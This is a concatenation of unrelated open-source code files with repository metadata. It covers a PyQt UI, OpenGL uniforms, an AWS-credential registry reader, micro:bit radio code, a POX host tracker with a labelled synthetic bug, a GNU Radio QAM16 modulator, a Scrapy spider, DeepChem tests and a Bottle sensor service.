"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> v = ((int)a)*256 + ((int)b);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> </p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> t0 = micros();</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> while (Serial.available() == 0) {</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[0] = analogRead(0);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[1] = analogRead(1);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[2] = analogRead(2);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[3] = analogRead(3);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[4] = analogRead(4);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[5] = analogRead(5);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> t = micros()-t0;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> for (i = 0; i < 6; i++) {</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a1 = y[i]/256;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a0 = y[i]%256;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a0);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a1);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> }</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a3 = t/16777216;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a2 = (t-a3*16777216)/65536;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a1 = (t-a3*16777216-a2*65536)/256;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a0 = t-a3*16777216-a2*65536-a1*256;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a0);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a1);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a2);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a3);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> delay(v);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> }</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> erase_msg_t();</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> }</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">}</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">void erase_msg_t(void) {</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> for (i = 0; i < 8; i++) msg_t[i] = \'9\';</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">}</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>", None))
self.tabPrincipal.setTabText(self.tabPrincipal.indexOf(self.tab_sobre), _translate("PyQtGate", "Sobre", None))
self.l_filename.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Último arquivo salvo ou lido. Um asterisco na frente indica que a última aquisição ainda não foi salva.</p></body></html>", None))
self.l_filename.setText(_translate("PyQtGate", "*Arquivo:", None))
from pyqtgraph import PlotWidget
|
jocoteles/photogate
|
PyQtGate/User_interface.py
|
Python
|
gpl-3.0
| 62,173
|
from OpenGL.GL import glUniformMatrix4fv, glUniform2fv, glUniform4fv
class MatrixUniform:
def __init__(self, data):
self._data = data
def bind(self, uniform_location):
count = 1
transpose = False
glUniformMatrix4fv(uniform_location, count, transpose, self._data)
class VectorUniform:
def __init__(self, data):
self._data = data
def bind(self, uniform_location):
count = 1
if len(self._data) == 2:
glUniform2fv(uniform_location, count, self._data)
elif len(self._data) == 4:
glUniform4fv(uniform_location, count, self._data)
else:
raise NotImplementedError(self._data)
|
nicholasbishop/bel
|
bel/uniform.py
|
Python
|
gpl-3.0
| 697
|
from _winreg import *
import boto3
import botocore
import os
def GetCredentialsFromUser():
print "IN GetCredentialsFromUser"
try:
ASKI = os.environ['AWS_ACCESS_KEY_ID']
except:
ASKI = raw_input("\n\nAWS Access Key ID: ")
try:
ASAK = os.environ['AWS_SECRET_ACCESS_KEY']
except:
ASAK = raw_input("\nAWS Secret Access Key: ")
return(ASAK,ASKI)
def ReadReg(wreg):
print "IN ReadRegistry"
try:
s3u_root_key = OpenKey(wreg, 'SOFTWARE\\AWS')
print "AWS key found!"
aws_secret_access_key = QueryValueEx(s3u_root_key, "ASAK")
aws_secret_key_id = QueryValueEx(s3u_root_key, "ASKI")
return(aws_secret_access_key, aws_secret_key_id)
except EnvironmentError:
print "AWS not installed. Creating..."
s3u_root_key = CreateKey(wreg, 'SOFTWARE\\AWS')
ASAK, ASKI = GetCredentialsFromUser()
SetValueEx(s3u_root_key, 'ASAK',0, REG_SZ, ASAK)
SetValueEx(s3u_root_key, 'ASKI',0, REG_SZ, ASKI)
CloseKey(s3u_root_key)
# let's get started
#
def LetsGetStarted():
print "LET'S GET STARTED"
try:
wreg = ConnectRegistry(None, HKEY_CURRENT_USER)
asak, aski = ReadReg(wreg)
aski = aski[0]
asak = asak[0]
print aski
print asak
s3 = boto3.resource('s3', aws_access_key_id=aski, aws_secret_access_key=asak)
for bucket in s3.buckets.all():
print(bucket.name)
except:
print "Something broke"
if __name__ == "__main__":
LetsGetStarted()
|
pktomlinson/awsregkeys
|
readwinreg.py
|
Python
|
gpl-3.0
| 1,449
|
class Communicator:
def __init__(self, group):
self.group = group
radio.on()
radio.config(group=group)
def send_command(self, command, value):
vals = {}
vals["command"] = command
vals["value"] = value
data = ":".join([str(x) + "," + str(vals[x]) for x in vals])
radio.send(data)
def wait_for_command(self):
while True:
msg = radio.receive()
if msg:
break
vals = msg.split(":")
data = {}
for x in vals:
key, value = x.split(",")
data[key] = value
return data
|
mdaudali/AdventureBit-MicroBit-Project
|
utilities.py
|
Python
|
gpl-3.0
| 639
|
# Copyright 2011
#
# Author: Dorgival Guedes
# Author: Kyriakos Zarifis
#
# This file is part of POX.
# Some of the arp/openflow-related code was borrowed from dumb_l3_switch.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
Keep track of hosts in the network, where they are and how they are
configured (at least MAC/IP addresses)
For the time being, it keeps tables with the information; later, it should
transfer that information to Topology and handle just the actual
discovery/update of host information.
Timer configuration can be changed when needed (e.g., for debugging) using
the launch facility (check timeoutSec dict and PingCtrl.pingLim).
"""
from pox.core import core
import pox
log = core.getLogger()
from pox.lib.packet.ethernet import ethernet
from pox.lib.packet.ipv4 import ipv4
from pox.lib.packet.arp import arp
from pox.lib.graph.nom import *
from pox.lib.recoco.recoco import Timer
from pox.lib.addresses import EthAddr, IPAddr
import pox.openflow.libopenflow_01 as of
import pox.openflow.discovery as discovery
from pox.lib.revent.revent import *
import time
import string
# Times (in seconds) to use for differente timouts:
timeoutSec = dict(
arpAware=60*2, # Quiet ARP-responding entries are pinged after this
arpSilent=60*20, # This is for uiet entries not known to answer ARP
arpReply=4, # Time to wait for an ARP reply before retrial
timerInterval=5, # Seconds between timer routine activations
entryMove=60 # Minimum expected time to move a physical entry
)
# Good values for testing:
# --arpAware=15 --arpSilent=45 --arpReply=1 --entryMove=4
# Another parameter that may be used:
# --pingLim=2
class Alive (object):
""" Holds liveliness information for MAC and IP entries
"""
def __init__ (self, livelinessInterval=timeoutSec['arpAware']):
self.lastTimeSeen = time.time()
self.interval=livelinessInterval
def expired (self):
return time.time() > self.lastTimeSeen + self.interval
def refresh (self):
self.lastTimeSeen = time.time()
class PingCtrl (Alive):
""" Holds information for handling ARP pings for hosts
"""
# Number of ARP ping attemps before deciding it failed
pingLim=3
def __init__ (self):
Alive.__init__(self, timeoutSec['arpReply'])
self.pending = 0
def sent (self):
self.refresh()
self.pending += 1
def failed (self):
return self.pending > PingCtrl.pingLim
def received (self):
# Clear any pending timeouts related to ARP pings
self.pending = 0
class IpEntry (Alive):
"""
This entry keeps track of IP addresses seen from each MAC entry and will
be kept in the macEntry object's ipAddrs dictionary. At least for now,
there is no need to refer to the original macEntry as the code is organized.
"""
def __init__ (self, hasARP):
if hasARP:
Alive.__init__(self,timeoutSec['arpAware'])
else:
Alive.__init__(self,timeoutSec['arpSilent'])
self.hasARP = hasARP
self.pings = PingCtrl()
def setHasARP (self):
if not self.hasARP:
self.hasARP = True
self.interval = timeoutSec['arpAware']
class HostTracker (EventMixin):
max_migrations = 300
_eventMixin_events = set([
HostJoin, # Defined in pox.lib.graph
HostLeave,
])
def __init__ (self):
#self._t = Timer(timeoutSec['timerInterval'],
# self._check_timeouts, recurring=True)
self.topology = core.topology
self.listenTo(core)
log.info("HostTracker ready")
self.migrations_observed = 0
def sendPing(self, macEntry, ipAddr):
r = arp() # Builds an "ETH/IP any-to-any ARP packet
r.opcode = arp.REQUEST
r.hwdst = macEntry.macaddr
r.protodst = ipAddr
# src is ETHER_ANY, IP_ANY
e = ethernet(type=ethernet.ARP_TYPE, src=r.hwsrc, dst=r.hwdst)
e.set_payload(r)
log.debug("%i %i sending ARP REQ to %s %s",
macEntry.dpid, macEntry.port, str(r.hwdst), str(r.protodst))
msg = of.ofp_packet_out(data = e.pack(),
action = of.ofp_action_output(port = macEntry.port))
if core.openflow.sendToDPID(macEntry.dpid, msg.pack()):
ipEntry = macEntry.ipAddrs[ipAddr]
ipEntry.pings.sent()
else:
# macEntry is stale, remove it.
log.debug("%i %i ERROR sending ARP REQ to %s %s",
macEntry.dpid, macEntry.port, str(r.hwdst), str(r.protodst))
del macEntry.ipAddrs[ipAddr]
return
def getSrcIPandARP(self, packet):
"""
This auxiliary function returns the source IPv4 address for packets that
have one (IPv4, ARPv4). Returns None otherwise.
"""
if isinstance(packet, ipv4):
log.debug("IP %s => %s",str(packet.srcip),str(packet.dstip))
return ( packet.srcip, False )
elif isinstance(packet, arp):
log.debug("ARP %s %s => %s",
{arp.REQUEST:"request",arp.REPLY:"reply"}.get(packet.opcode,
'op:%i' % (packet.opcode,)),
str(packet.protosrc), str(packet.protodst))
if packet.hwtype == arp.HW_TYPE_ETHERNET and \
packet.prototype == arp.PROTO_TYPE_IP and \
packet.protosrc != 0:
return ( packet.protosrc, True )
return ( None, False )
def updateIPInfo(self, pckt_srcip, macEntry, hasARP):
""" If there is IP info in the incoming packet, update the macEntry
accordingly. In the past we assumed a 1:1 mapping between MAC and IP
addresses, but removed that restriction later to accomodate cases
like virtual interfaces (1:n) and distributed packet rewriting (n:1)
"""
if pckt_srcip in macEntry.ipAddrs:
# that entry already has that IP
ipEntry = macEntry.ipAddrs[pckt_srcip]
ipEntry.refresh()
log.debug("%s already has IP %s, refreshing",
str(macEntry), str(pckt_srcip) )
else:
# new mapping
ipEntry = IpEntry(hasARP)
macEntry.ipAddrs[pckt_srcip] = ipEntry
log.info("Learned %s got IP %s", str(macEntry), str(pckt_srcip) )
if hasARP:
ipEntry.pings.received()
def _handle_GoingUpEvent (self, event):
self.listenTo(core.openflow)
def _handle_PacketIn (self, event):
"""
Populate MAC and IP tables based on incoming packets.
Handles only packets from ports identified as not switch-only.
If a MAC was not seen before, insert it in the MAC table;
otherwise, update table and enry.
If packet has a source IP, update that info for the macEntry (may require
removing the info from antoher entry previously with that IP address).
It does not forward any packets, just extract info from them.
"""
dpid = event.connection.dpid
inport = event.port
packet = event.parse()
if not packet.parsed:
log.warning("%i %i ignoring unparsed packet", dpid, inport)
return
if packet.type == ethernet.LLDP_TYPE: # Ignore LLDP packets
return
if core.openflow_discovery.isSwitchOnlyPort(dpid, inport):
# No host should be right behind a switch-only port
log.debug("Ignoring packetIn at switch-only port (%i, %i)", dpid, inport)
return
log.debug("PacketIn: %i %i ETH %s => %s",
dpid, inport, str(packet.src), str(packet.dst))
mac = packet.src
# Learn or update dpid/port/MAC info
host = core.topology.find(IsInstance(Host), macstr=mac.toStr())#, one=True)
"""
This should be unnecessary. Check if find()'s 'one=True' works
"""
if host:
host = host[0]
if not host:
# there is no known host by that MAC
log.info("Learned %s", packet.src)
(pckt_srcip, hasARP) = self.getSrcIPandARP(packet.next)
if pckt_srcip:
newHost = Host(mac.toStr(), pckt_srcip, (dpid, inport))
else:
newHost = Host(mac.toStr(), None, (dpid, inport))
self.topology.addEntity(newHost)
self.raiseEventNoErrors(HostJoin, newHost)
# Create new access link and add it on the NOM
newLink = AccessLink(dpid, inport, newHost.macstr)
self.topology.addEntity(newLink)
self.raiseEventNoErrors(LinkEvent, True, newLink)
elif host.location != (dpid, inport):
# there is already an entry of host with that MAC, but host has moved
# should we raise a HostMoved event (at the end)?
log.info("Learned %s moved to %i %i", host.mac, dpid, inport)
# SYNTHETIC BUG
self.migrations_observed += 1
if self.migrations_observed == HostTracker.max_migrations:
import os
print "YOU FOUND THE MEMORY LEAK! 10 POINTS TO SLYTHERIN"
os._exit(1)
"""
# if there has not been long since heard from it...
if time.time() - macEntry.lastTimeSeen < timeoutSec['entryMove']:
log.warning("Possible duplicate: %s at time %i, now (%i %i), time %i",
str(macEntry), macEntry.lastTimeSeen(),
dpid, inport, time.time())
# should we create a whole new entry, or keep the previous host info?
# for now, we keep it: IP info, answers pings, etc.
"""
switch = core.topology.getEntityByID(dpid)
port = inport
host.location = (switch, port)
# TODO, remove old access link from NOM and add new one
return
def _check_timeouts(self):
for macEntry in self.entryByMAC.values():
entryPinged = False
for ip_addr, ipEntry in macEntry.ipAddrs.items():
if ipEntry.expired():
if ipEntry.pings.failed():
del macEntry.ipAddrs[ip_addr]
log.info("Entry %s: IP address %s expired",
str(macEntry), str(ip_addr) )
else:
self.sendPing(macEntry,ip_addr)
ipEntry.pings.sent()
entryPinged = True
if macEntry.expired() and not entryPinged:
log.info("Entry %s expired", str(macEntry))
# sanity check: there should be no IP addresses left
if len(macEntry.ipAddrs) > 0:
for ip in macEntry.ipAddrs.keys():
log.warning("Entry %s expired but still had IP address %s",
str(macEntry), str(ip_addr) )
del macEntry.ipAddrs[ip_addr]
del self.entryByMAC[macEntry.macaddr]
|
jmiserez/pox
|
pox/host_tracker/buggy_host_tracker.py
|
Python
|
gpl-3.0
| 10,685
|
#
# Copyright 2005,2006 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# See gnuradio-examples/python/digital for examples
"""
QAM16 modulation and demodulation.
"""
from gnuradio import gr, gru, modulation_utils
from math import pi, sqrt
import qam
import cmath
from pprint import pprint
# default values (used in __init__ and add_options)
_def_samples_per_symbol = 2
_def_excess_bw = 0.35
_def_gray_code = True
_def_verbose = False
_def_log = False
_def_costas_alpha = None
_def_gain_mu = 0.03
_def_mu = 0.05
_def_omega_relative_limit = 0.005
# /////////////////////////////////////////////////////////////////////////////
# QAM16 modulator
# /////////////////////////////////////////////////////////////////////////////
class qam16_mod(gr.hier_block):
def __init__(self, fg,
samples_per_symbol=_def_samples_per_symbol,
excess_bw=_def_excess_bw,
gray_code=_def_gray_code,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for RRC-filtered QPSK modulation.
The input is a byte stream (unsigned char) and the
output is the complex modulated signal at baseband.
@param fg: flow graph
@type fg: flow graph
@param samples_per_symbol: samples per symbol >= 2
@type samples_per_symbol: integer
@param excess_bw: Root-raised cosine filter excess bandwidth
@type excess_bw: float
@param gray_code: Tell modulator to Gray code the bits
@type gray_code: bool
@param verbose: Print information about modulator?
@type verbose: bool
@param debug: Print modualtion data to files?
@type debug: bool
"""
self._fg = fg
self._samples_per_symbol = samples_per_symbol
self._excess_bw = excess_bw
self._gray_code = gray_code
if not isinstance(samples_per_symbol, int) or samples_per_symbol < 2:
raise TypeError, ("sbp must be an integer >= 2, is %d" % samples_per_symbol)
ntaps = 11 * samples_per_symbol
arity = pow(2, self.bits_per_symbol())
# turn bytes into k-bit vectors
self.bytes2chunks = \
gr.packed_to_unpacked_bb(self.bits_per_symbol(), gr.GR_MSB_FIRST)
if self._gray_code:
self.symbol_mapper = gr.map_bb(qam.binary_to_gray[arity])
else:
self.symbol_mapper = gr.map_bb(qam.binary_to_ungray[arity])
self.diffenc = gr.diff_encoder_bb(arity)
rot = 1.0
print "constellation with %d arity" % arity
rotated_const = map(lambda pt: pt * rot, qam.constellation[arity])
self.chunks2symbols = gr.chunks_to_symbols_bc(rotated_const)
# pulse shaping filter
self.rrc_taps = gr.firdes.root_raised_cosine(
self._samples_per_symbol, # gain (sps since we're interpolating by sps)
self._samples_per_symbol, # sampling rate
1.0, # symbol rate
self._excess_bw, # excess bandwidth (roll-off factor)
ntaps)
self.rrc_filter = gr.interp_fir_filter_ccf(self._samples_per_symbol, self.rrc_taps)
if verbose:
self._print_verbage()
if log:
self._setup_logging()
# Connect & Initialize base class
self._fg.connect(self.bytes2chunks, self.symbol_mapper, self.diffenc,
self.chunks2symbols, self.rrc_filter)
gr.hier_block.__init__(self, self._fg, self.bytes2chunks, self.rrc_filter)
def samples_per_symbol(self):
return self._samples_per_symbol
def bits_per_symbol(self=None): # staticmethod that's also callable on an instance
return 4
bits_per_symbol = staticmethod(bits_per_symbol) # make it a static method. RTFM
def _print_verbage(self):
print "bits per symbol = %d" % self.bits_per_symbol()
print "Gray code = %s" % self._gray_code
print "RRS roll-off factor = %f" % self._excess_bw
def _setup_logging(self):
print "Modulation logging turned on."
self._fg.connect(self.bytes2chunks,
gr.file_sink(gr.sizeof_char, "bytes2chunks.dat"))
self._fg.connect(self.symbol_mapper,
gr.file_sink(gr.sizeof_char, "graycoder.dat"))
self._fg.connect(self.diffenc,
gr.file_sink(gr.sizeof_char, "diffenc.dat"))
self._fg.connect(self.chunks2symbols,
gr.file_sink(gr.sizeof_gr_complex, "chunks2symbols.dat"))
self._fg.connect(self.rrc_filter,
gr.file_sink(gr.sizeof_gr_complex, "rrc_filter.dat"))
def add_options(parser):
"""
Adds QAM modulation-specific options to the standard parser
"""
parser.add_option("", "--excess-bw", type="float", default=_def_excess_bw,
help="set RRC excess bandwith factor [default=%default] (PSK)")
parser.add_option("", "--no-gray-code", dest="gray_code",
action="store_false", default=_def_gray_code,
help="disable gray coding on modulated bits (PSK)")
add_options=staticmethod(add_options)
def extract_kwargs_from_options(options):
"""
Given command line options, create dictionary suitable for passing to __init__
"""
return modulation_utils.extract_kwargs_from_options(qam16_mod.__init__,
('self', 'fg'), options)
extract_kwargs_from_options=staticmethod(extract_kwargs_from_options)
# /////////////////////////////////////////////////////////////////////////////
# QAM16 demodulator
#
# /////////////////////////////////////////////////////////////////////////////
class qam16_demod(gr.hier_block):
def __init__(self, fg,
samples_per_symbol=_def_samples_per_symbol,
excess_bw=_def_excess_bw,
costas_alpha=_def_costas_alpha,
gain_mu=_def_gain_mu,
mu=_def_mu,
omega_relative_limit=_def_omega_relative_limit,
gray_code=_def_gray_code,
verbose=_def_verbose,
log=_def_log):
# do this
pass
def bits_per_symbol(self=None): # staticmethod that's also callable on an instance
return 4
bits_per_symbol = staticmethod(bits_per_symbol) # make it a static method. RTFM
#
# Add these to the mod/demod registry
#
# NOT READY TO BE USED YET -- ENABLE AT YOUR OWN RISK
#modulation_utils.add_type_1_mod('qam16', qam16_mod)
#modulation_utils.add_type_1_demod('qam16', qam16_demod)
|
trnewman/VT-USRP-daughterboard-drivers_python
|
gnuradio-core/src/python/gnuradio/blksimpl/qam16.py
|
Python
|
gpl-3.0
| 7,447
|
# -*- coding: utf-8 -*-
import scrapy
import json
import re
class MeetingsSpider(scrapy.Spider):
name = "meetings"
allowed_domains = ["ratsinfo.leipzig.de"]
def start_requests(self):
url = getattr(
self,
"start_url",
"https://ratsinfo.leipzig.de/bi/oparl/1.0/meetings.asp?organization=2387",
)
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
self.logger.info("Parsing page: %s", response.url)
page = json.loads(response.text)
meetings = page["data"]
for meeting in meetings:
yield meeting
next_url = page["links"].get("next")
if next_url is None:
self.last_url = response.url
else:
yield scrapy.Request(url=next_url, callback=self.parse)
|
CodeforLeipzig/allris-scraper
|
allris/spiders/meetings.py
|
Python
|
gpl-3.0
| 843
|
"""
Test that Layers work as advertised.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "Han Altae-Tran and Bharath Ramsundar"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "GPL"
import numpy as np
import unittest
import deepchem as dc
from tensorflow.python.framework import test_util
class TestLayers(test_util.TensorFlowTestCase):
"""
Test Layers.
The tests in this class only do basic sanity checks to make sure that
produced tensors have the right shape.
"""
def setUp(self):
super(TestLayers, self).setUp()
self.root = '/tmp'
def test_dense(self):
"""Tests dense layer class can be initialized."""
with self.test_session() as sess:
dense = dc.nn.Dense(32, input_dim=16)
def test_dropout(self):
"""Tests that dropout can be initialized."""
with self.test_session() as sess:
dropout = dc.nn.Dropout(.5)
def test_input(self):
"""Tests that inputs can be created."""
with self.test_session() as sess:
input_layer = dc.nn.Input(shape=(32,))
#def test_batch_normalization(self):
# """Tests that batch normalization layers can be created."""
def test_graph_convolution(self):
"""Tests that Graph Convolution transforms shapes correctly."""
n_atoms = 5
n_feat = 10
nb_filter = 7
with self.test_session() as sess:
graph_topology = dc.nn.GraphTopology(n_feat)
graph_conv_layer = dc.nn.GraphConv(nb_filter)
X = graph_topology.get_input_placeholders()
out = graph_conv_layer(X)
# Output should be of shape (?, nb_filter)
assert out.get_shape()[1] == nb_filter
def test_graph_gather(self):
"""Tests that GraphGather transforms shapes correctly."""
n_atoms = 5
n_feat = 10
batch_size = 3
nb_filter = 7
with self.test_session() as sess:
graph_topology = dc.nn.GraphTopology(n_feat)
graph_gather_layer = dc.nn.GraphGather(batch_size)
X = graph_topology.get_input_placeholders()
out = graph_gather_layer(X)
# Output should be of shape (batch_size, n_feat)
assert out.get_shape() == (batch_size, n_feat)
def test_graph_pool(self):
"""Tests that GraphPool transforms shapes correctly."""
n_atoms = 5
n_feat = 10
batch_size = 3
nb_filter = 7
with self.test_session() as sess:
graph_topology = dc.nn.GraphTopology(n_feat)
graph_pool_layer = dc.nn.GraphPool()
X = graph_topology.get_input_placeholders()
out = graph_pool_layer(X)
def test_attn_lstm_embedding(self):
"""Test that attention LSTM computation works properly."""
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
nb_filter = 7
with self.test_session() as sess:
graph_topology_test = dc.nn.GraphTopology(n_feat)
graph_topology_support = dc.nn.GraphTopology(n_feat)
test = graph_topology_test.get_input_placeholders()[0]
support = graph_topology_support.get_input_placeholders()[0]
attn_embedding_layer = dc.nn.AttnLSTMEmbedding(
n_test, n_support, max_depth)
# Try concatenating the two lists of placeholders
feed_dict = {test: np.zeros((n_test, n_feat)),
support: np.zeros((n_support, n_feat))}
test_out, support_out = attn_embedding_layer([test, support])
assert test_out.get_shape() == (n_test, n_feat)
assert support_out.get_shape()[1] == (n_feat)
def test_resi_lstm_embedding(self):
"""Test that attention LSTM computation works properly."""
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
nb_filter = 7
with self.test_session() as sess:
graph_topology_test = dc.nn.GraphTopology(n_feat)
graph_topology_support = dc.nn.GraphTopology(n_feat)
test = graph_topology_test.get_input_placeholders()[0]
support = graph_topology_support.get_input_placeholders()[0]
resi_embedding_layer = dc.nn.ResiLSTMEmbedding(
n_test, n_support, max_depth)
# Try concatenating the two lists of placeholders
feed_dict = {test: np.zeros((n_test, n_feat)),
support: np.zeros((n_support, n_feat))}
test_out, support_out = resi_embedding_layer([test, support])
assert test_out.get_shape() == (n_test, n_feat)
assert support_out.get_shape()[1] == (n_feat)
|
bowenliu16/deepchem
|
deepchem/nn/tests/test_layers.py
|
Python
|
gpl-3.0
| 4,390
|
#!/usr/bin/env python2.6
# -*- coding: utf-8 -*-
import sys
import logging
### RESTful service routing
from optparse import OptionParser
from bottle import route, run, debug, request, static_file
_SENSOR_FULL_NAMES= {
"t" : u"Temperature (ºC)",
"p" : "Pressure (Pascal)",
"a" : "Air Quality",
"l" : "Luminosity (Lux)",
